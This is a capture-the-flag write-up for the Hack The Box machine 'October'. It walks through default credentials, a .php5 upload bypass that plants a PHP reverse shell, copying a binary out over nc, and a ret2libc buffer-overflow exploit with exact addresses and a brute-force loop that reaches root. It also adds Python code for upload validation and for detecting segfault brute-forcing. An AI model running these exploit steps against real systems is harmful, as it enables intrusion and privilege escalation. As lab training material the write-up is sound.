HTB: October

Details

This machine is October from Hack The Box

Recon

root@kali:~# nmap -sV -p- -T4 10.10.10.16
Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-28 14:45 EDT
Nmap scan report for 10.10.10.16
Host is up (0.046s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.11 seconds

User

I started on http://10.10.10.16

Screenshot 1

I went to http://10.10.10.16/backend/

Screenshot 2

Where I tried creds of

admin:admin

Screenshot 3

According to https://www.exploit-db.com/exploits/41936 I may be able to upload PHP by using the .php5 extension, so I took a PHP reverse shell, changed its extension to .php5 and headed over to the media menu

Screenshot 4

I uploaded it and set a listener

root@kali:~# nc -nlvp 4444

And visited the file at http://10.10.10.16/storage/app/media/php-reverse-shell.php5

connect to [10.10.14.11] from (UNKNOWN) [10.10.10.16] 49986
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
 22:03:51 up 1 min,  0 users,  load average: 0.18, 0.11, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
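The server-side cause of that upload, as an added example that is neither OctoberCMS code nor from this writeup: a denylist that refuses only an exact .php extension (the behaviour that lets .php5 through) beside an allowlist check that also verifies the upload's leading bytes. The extension list and magic-byte table are assumptions made for the example.

```python
import os

# Constructed lists for the example: what the upload handler accepts, and the
# signatures a file with that extension must start with.
ALLOWED_MEDIA = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}

def ext_of(filename):
    return os.path.splitext(filename)[1].lower()

def denylist_check(filename):
    """Weak check: only an exact '.php' extension is refused, so a renamed
    shell with '.php5' (or '.phtml', '.phar', ...) is accepted and, once the
    web server maps that extension to PHP, executes."""
    return ext_of(filename) != ".php"

def allowlist_check(filename, head=None):
    """Hardened check: accept only known media extensions, ignore any path
    component, refuse extra dots in the stem (Apache's mod_mime can act on
    any extension in a multi-extension name) and, when the first bytes of
    the upload are supplied, require them to match the claimed type."""
    name = os.path.basename(filename)
    ext = ext_of(name)
    if ext not in ALLOWED_MEDIA:
        return False
    stem = name[: -len(ext)]
    if not stem or "." in stem:
        return False
    if head is not None and not head.startswith(MAGIC[ext]):
        return False
    return True
```

The magic-byte check only closes the "rename the shell to .png" path; serving the upload directory without a PHP handler is the other half of the fix and is web-server configuration, not code.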

The reverse shell connected, so I upgraded it

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@october:/$

And went flag hunting

www-data@october:/home$ ls -la
total 12
drwxr-xr-x  3 root  root  4096 Apr 20  2017 .
drwxr-xr-x 21 root  root  4096 May 17  2017 ..
drwxr-xr-x  4 harry harry 4096 Apr 21  2017 harry

www-data@october:/home$ cd harry
www-data@october:/home/harry$ ls -la
total 5044
drwxr-xr-x 4 harry harry    4096 Apr 21  2017 .
drwxr-xr-x 3 root  root     4096 Apr 20  2017 ..
-rw------- 1 root  root        1 Dec 24  2017 .bash_history
-rw-r--r-- 1 harry harry     220 Apr 20  2017 .bash_logout
-rw-r--r-- 1 harry harry    3637 Apr 20  2017 .bashrc
drwx------ 2 harry harry    4096 Apr 20  2017 .cache
drwxr-xr-x 3 root  root     4096 Apr 20  2017 .composer
-rw------- 1 root  root       10 May 17  2017 .nano_history
-rw-r--r-- 1 harry harry     675 Apr 20  2017 .profile
-rw-rw-r-- 1 harry harry 5123369 Apr 20  2017 october-1.0.412.tar.gz
-r--r--r-- 1 harry harry      33 Apr 21  2017 user.txt

www-data@october:/home/harry$ cat user.txt
[REDACTED]

Root

I then searched for suid binaries

www-data@october:/home/harry$ find / -perm -u=s 2>/dev/null
[SNIP]
/usr/local/bin/ovrflw

One called ovrflw stood out, so I took a look

www-data@october:/home/harry$ cd /usr/local/bin
www-data@october:/usr/local/bin$ ls -la
total 16
drwxr-xr-x  2 root root 4096 Apr 21  2017 .
drwxr-xr-x 10 root root 4096 Apr 20  2017 ..
-rwsr-xr-x  1 root root 7377 Apr 21  2017 ovrflw

www-data@october:/usr/local/bin$ file ovrflw
ovrflw: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=004cdf754281f7f7a05452ea6eaf1ee9014f07da, not stripped

www-data@october:/usr/local/bin$ ./ovrflw hi

I tried to make it crash

www-data@october:/usr/local/bin$ ./ovrflw $(python -c "print('A'*1000)")
Segmentation fault (core dumped)

So I could crash it. Next I needed a copy of the binary back on my machine

root@kali:~# nc -nvlp 5555 > ovrflw

www-data@october:/usr/local/bin$ nc 10.10.14.11 5555 < ovrflw

Running it in gdb I found I could overwrite EIP with 112 As followed by 4 Bs

gdb-peda$ run $(python -c "print('A'*112 + 'BBBB')")
Starting program: /tmp/ovrflw $(python -c "print('A'*112 + 'BBBB')")

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0xffffd590 ("AABBBB")
EDX: 0xffffd2ea ("AABBBB")
ESI: 0xf7fab000 --> 0x1d9d6c
EDI: 0xf7fab000 --> 0x1d9d6c
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd2f0 --> 0x0
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd2f0 --> 0x0
0004| 0xffffd2f4 --> 0xffffd384 --> 0xffffd516 ("/tmp/ovrflw")
0008| 0xffffd2f8 --> 0xffffd390 --> 0xffffd597 ("SHELL=/bin/bash")
0012| 0xffffd2fc --> 0xffffd314 --> 0x0
0016| 0xffffd300 --> 0x1
0020| 0xffffd304 --> 0x0
0024| 0xffffd308 --> 0xf7fab000 --> 0x1d9d6c
0028| 0xffffd30c --> 0xffffffff
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSE

I then checked it for binary protections

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

It has NX, so I checked the host for ASLR

www-data@october:/usr/local/bin$ cat /proc/sys/kernel/randomize_va_space
2

ASLR is on. I’ll use ret2libc for the exploit, and as it is a 32-bit binary I’ll brute force the ASLR. So I grabbed the various memory locations I needed

www-data@october:/usr/local/bin$ gdb ./ovrflw
(gdb) b main
Breakpoint 1 at 0x8048480

(gdb) run
Starting program: /usr/local/bin/ovrflw

Breakpoint 1, 0x08048480 in main ()

(gdb) p system
$1 = {<text variable, no debug info>} 0xb75d2310 <__libc_system>

(gdb) p exit
$2 = {<text variable, no debug info>} 0xb75c5260 <__GI_exit>

(gdb) find 0xb75d2310, +99999999, "/bin/sh"
find 0xb75d2310, +99999999, "/bin/sh"
0xb76f4bac

So the addresses were

system: 0xb75d2310
exit: 0xb75c5260
/bin/sh: 0xb76f4bac

These need to be packed little-endian and the exploit run in a loop. The input I want is

GARBAGE + SYSTEM + EXIT + BINSH

So my exploit was

$(python -c "print('A'*112 + '\x10\x23\x5d\xb7' + '\x60\x52\x5c\xb7' + '\xac\x4b\x6f\xb7')")

Which I ran in a loop to defeat ASLR

www-data@october:/$ while true; do /usr/local/bin/ovrflw $(python -c "print('A'*112 + '\x10\x23\x5d\xb7' + '\x60\x52\x5c\xb7' + '\xac\x4b\x6f\xb7')"); done

I then let it run for a while, until eventually

#

A shell opened

# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)

And I’m root, so I grabbed my flag

# cd /root

# ls -la
total 32
drwx------  3 root root 4096 Dec 24  2017 .
drwxr-xr-x 21 root root 4096 May 17  2017 ..
-rw-------  1 root root    1 Dec 24  2017 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 May  6  2017 .cache
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-------  1 root root  647 Dec 24  2017 .viminfo
-r--------  1 root root   33 Apr 21  2017 root.txt

# cat root.txt
[REDACTED]
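From the defender's side, the loop above is noisy: every failed guess is a segfault the kernel logs. As an added example that is not part of the writeup, a small detector over constructed syslog lines flags a binary that crashes repeatedly inside a short window and checks whether the faulting address keeps the same page offset, which is what retrying one fixed guess while ASLR only moves the page base looks like. The log format, sample lines and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed syslog lines (not taken from the box) modelling the kernel
# messages a loop of failed ret2libc guesses leaves behind: one per attempt.
SAMPLE_LOG = """\
Sep 28 22:10:01 october kernel: [ 2210.1] ovrflw[2231]: segfault at b75d2310 ip b75d2310 sp bffff3d0 error 14
Sep 28 22:10:01 october kernel: [ 2210.3] ovrflw[2232]: segfault at b7612310 ip b7612310 sp bffff3d0 error 14
Sep 28 22:10:01 october kernel: [ 2210.5] ovrflw[2233]: segfault at b7582310 ip b7582310 sp bffff3d0 error 14
Sep 28 22:10:02 october kernel: [ 2211.0] ovrflw[2234]: segfault at b75a2310 ip b75a2310 sp bffff3d0 error 14
Sep 28 22:10:02 october kernel: [ 2211.2] ovrflw[2235]: segfault at b76c2310 ip b76c2310 sp bffff3d0 error 14
Sep 28 22:10:02 october kernel: [ 2211.4] ovrflw[2236]: segfault at b75f2310 ip b75f2310 sp bffff3d0 error 14
Sep 28 22:30:00 october kernel: [ 3410.0] firefox[3102]: segfault at 0 ip 08050000 sp bffff000 error 4
"""

SEGV_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: \[[^\]]*\] "
    r"(?P<comm>[^\[]+)\[(?P<pid>\d+)\]: segfault at [0-9a-f]+ ip (?P<ip>[0-9a-f]+)"
)

def parse_segfaults(log_text, year=2019):
    """Yield (timestamp, comm, pid, faulting_ip) for each kernel segfault line."""
    for line in log_text.splitlines():
        m = SEGV_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["comm"], int(m["pid"]), int(m["ip"], 16)

def find_bruteforce(log_text, window_seconds=60, threshold=5):
    """Map each binary that segfaults >= threshold times inside one window to
    (largest burst, whether every faulting ip shares the same low 12 bits).
    A constant page offset means one fixed address is being retried."""
    by_comm = defaultdict(list)
    for ts, comm, _pid, ip in parse_segfaults(log_text):
        by_comm[comm].append((ts, ip))
    alerts = {}
    for comm, events in by_comm.items():
        events.sort()
        start, burst = 0, 0
        for end in range(len(events)):  # sliding window over crash times
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            burst = max(burst, end - start + 1)
        if burst >= threshold:
            same_offset = len({ip & 0xFFF for _ts, ip in events}) == 1
            alerts[comm] = (burst, same_offset)
    return alerts
```

On a real host the same signal is available from dmesg or journalctl -k; an audit rule on execve of the setuid binary gives the per-attempt count without relying on the crash messages.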
